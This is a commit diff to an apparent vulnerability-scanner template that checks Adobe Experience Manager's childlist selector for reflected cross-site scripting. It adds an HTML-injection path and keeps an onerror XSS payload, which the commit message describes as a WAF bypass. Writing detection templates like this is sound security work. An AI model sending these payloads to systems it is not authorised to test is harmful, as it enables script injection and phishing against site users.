added waf bypass html payload
parent
33266ab033
commit
f38ee97a34
|
@ -1,7 +1,7 @@
|
||||||
id: aem-xss-childlist
|
id: aem-xss-childlist
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Adobe Experience Manager - Childlist selector Cross-Site Scripting
|
name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting
|
||||||
author: theabhinavgaur
|
author: theabhinavgaur
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
|
@ -17,7 +17,8 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/{{rand_base(4)}}{{rand_base(5)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
|
- "{{BaseURL}}/test<br><br>please%20authenticate<br><br>.childrenlist.html"
|
||||||
|
- "{{BaseURL}}/test<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -25,8 +26,13 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '<img src="x" data onerror="alert(domain)"/>'
|
- '<img src="x" data onerror="alert(domain)"/>'
|
||||||
|
- '<br /><br />please authenticate<br /><br />'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
- 'data-coral-columnview-id'
|
- 'data-coral-columnview-id'
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: content_type
|
part: content_type
|
||||||
|
@ -35,4 +41,4 @@ requests:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
Loading…
Reference in New Issue